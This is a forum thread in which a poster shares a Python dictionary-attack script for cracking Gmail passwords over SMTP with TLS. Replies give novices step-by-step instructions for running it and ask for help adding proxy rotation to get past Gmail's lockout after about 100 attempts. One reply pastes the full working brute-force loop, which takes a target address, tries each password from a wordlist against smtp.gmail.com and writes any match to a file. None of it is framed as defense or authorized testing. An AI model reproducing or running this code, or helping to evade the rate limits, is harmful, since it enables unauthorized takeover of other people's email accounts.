Forum Thread: GMail Brute Force Dictionary Attack Script

Hey everybody.

So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.

I've noticed a lot on this forum and other sites that Gmail is really difficult to crack with Hydra, mostly because companies like Google have taken precautions against it. I've had some decent success with Hydra against Gmail, but decided to write my own dictionary attack script to see if I could do any better.

Well, I wrote my script to use TLS on port 587 instead of Hydra using SSL on 465. So far I've found I've had a MUCH higher success rate, whereas using Hydra kept getting me locked out. The script is really basic (less than 20 lines of actual code), but seems to be really powerful so far, so I decided to share.

http://pastebin.com/VLVHWyZq

I wrote this in Python and it takes no command line arguments. Just run the script and it will prompt you for what it needs.

Happy Hacking!

31 Responses

Wow, this is what i have been looking for! I have tried many times to brute force gmail but it blocks me everytime when i reach something like 200 attempts :D

TY, I hope it works :D

Awesome! Please let me know how it works out for you. For whatever reason it seems like certain addresses are more "secure" than others and lockouts occur a lot sooner.

actually i know nothing about programming :/
i thought i just could copy your script into python? but i cant even find python in kali ><

can you please explain to a "noobie" how to try this. details pls.
thank you

Ok friend. What you want to do is you want to open the terminal and type cd /root/Desktop/
nano gmail.py
paste the contents
press ctrl + x
y
enter
then do chmod 775 gmail.py
python gmail.py
and it should start doing the program

can you please help me, It is saying that my correct password is incorrect

found it but can you please tell me how to get this to work with other mail services?

Se7enpeace:

The two scripts do the exact same thing using different programs, but written in two different languages. Thanks for pointing that out though!

That script actually uses Hydra to do the work. The one I wrote is completely independent of Hydra and uses a different encryption connection method (TLS instead of SSL).

Has anybody tested the script out? I'm not being able to put it to work..

What happens when you try to run it?

I tried to use the script against an e-mail account I've created, and when it gets to the real password it label's it as incorrect.

I have tried it, but gmail will block you after 100 attempts. Its not worth it. Unless you know a way to pass this block?

wtf, its not working. i have entered my password in passlist and then i do that but it dosent work. an any one help me?

Well, Gmail terminates the connection after every 100 attempts or so... this makes it pretty useless. Solution might be to include change of proxy in the present code..Can someone post the code of that or give an idea how to code it?

Thanks!

Someone mentioned earlier that for some accounts, Gmail seems to terminate/block the IP much earlier, in my case... after a feeble 12 attempts! I was using Hydra though, have not tried this script - has it been update to change proxy every xxx attempts? Could you make it so that we can adjust the number of attempts - as others have quoted 100-150, but mine was as low as 12??? Thanks!

Do this script proxy server and send me

Do you actually know if a proxy will thwart their brute force protection? Or is this just based on assumptions.

They may have different levels of throttling: e.g., 100 attempts per IP in (x) hours, ban that IP for a couple hours, 200 attempts by ANY IP in (x) hours, prevent all logins to account (any IP) for a couple hours, etc.

help please
NameError: name 'passwordfile

everytime i make this script this comes up Name error passwordfile help guys

Hello, I'm sorry to sound stupid because I am not very experienced with using python. After I enter the target's email address, the code asks for a password file name. What does this mean and what do I need to do?

You need to tell program where password file is(file path) . For example, if your password file is in /home/user/Desktop and name of file is password.txt , you should write /home/user/Desktop/password.txt and thats it. Hit enter and watch magic happens. Cheers !

What is password file.
What should i do if I'm trying to run the program by my smartphone??

@BURNCT im trying to get in contact with you. how do i msg you directly? im stuck at the same spot you were in another post and i dont know if anyone ever figured it out. skype>djmasentertainment

Dude i am a learner to python.
I don't know how to apply this program.
What things i will have to put manually??
Every time i run this, it says syntax error.
Please help me.

Step 1:

Help me

Dude i am a learner to python.
I don't know how to apply this program.
What things i will have to put manually??
Every time i run this, it says syntax error.
Please help me

thish script is not proper doing password is incrocet

The reason this script does not work is because he didn't write it the original author is Toxic-ig the script is a small section of the file gmail.py in the program Trity so if you want it to work right download it off of git hub.

if the program stops and u cant see the correct password try this:
import smtplib
import pathlib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = input("Enter the target's email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")

for password in passwfile:
try:
smtpserver.login(user, password)
print("+ Password Found: %s" % password)
pathlib.Path("output.txt").write_text("%s" % password)
exit()

except smtplib.SMTPAuthenticationError:
print("!XxXxXxXxXxXxXxXxXxXx Password Incorrect: %s" % password)
#MAKE SURE U ADD THE PATHLIB
#THIS WILL CREATE A NOTEPAD FILE WHICH WILL STORE THE CORRECT PASSWORD

Does anyone figure out how to bypass the 100 tries?

this is a nice script. But this could not be used for practical purposes. As google is a top company in the market, It uses high security process. This script could only be used when the target has less secure apps enabled in security settings in their google account. otherwise this script would not work

I AM FULL NEW AND I WANT SOME GUIDENCE AND LINK IS NOT WORKING "THIS SITE CANT be reached" please send me another link and recommend me a tutorial

Share Your Thoughts

  • Hot
  • Active